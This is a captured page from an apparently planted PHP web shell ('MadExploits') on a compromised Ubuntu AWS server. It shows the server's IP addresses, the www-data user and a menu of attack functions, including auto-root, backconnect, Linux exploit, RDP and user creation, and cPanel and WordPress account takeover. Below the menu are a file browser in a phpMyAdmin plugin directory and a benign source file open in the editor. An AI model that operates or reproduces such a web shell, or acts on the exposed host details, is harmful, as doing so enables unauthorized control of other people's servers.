Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.117.71.244
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
phpmyadmin /
src /
Plugins /
Import /
[ HOME SHELL ]
Name
Size
Permission
Action
Upload
[ DIR ]
drwxr-xr-x
AbstractImportCsv.php
1.75
KB
-rw-r--r--
ImportFormat.php
818
B
-rw-r--r--
ImportLdi.php
6.73
KB
-rw-r--r--
ImportMediawiki.php
17.44
KB
-rw-r--r--
ImportOds.php
12.01
KB
-rw-r--r--
ImportShp.php
11.04
KB
-rw-r--r--
ImportSql.php
6.04
KB
-rw-r--r--
ImportXml.php
8.05
KB
-rw-r--r--
README.md
4.5
KB
-rw-r--r--
ShapeFileImport.php
695
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ShapeFileImport.php
<?php /** * This class extends ShapeFile class to cater the following phpMyAdmin * specific requirements. */ declare(strict_types=1); namespace PhpMyAdmin\Plugins\Import; use PhpMyAdmin\ShapeFile\ShapeFile; /** * ShapeFileImport class */ class ShapeFileImport extends ShapeFile { /** * Reads given number of bytes from SHP file * * @param int $bytes number of bytes */ public function readSHP(int $bytes): string|false { return ImportShp::readFromBuffer($bytes); } /** * Checks whether file is at EOF */ public function eofSHP(): bool { $GLOBALS['eof'] ??= null; return (bool) $GLOBALS['eof']; } }
Close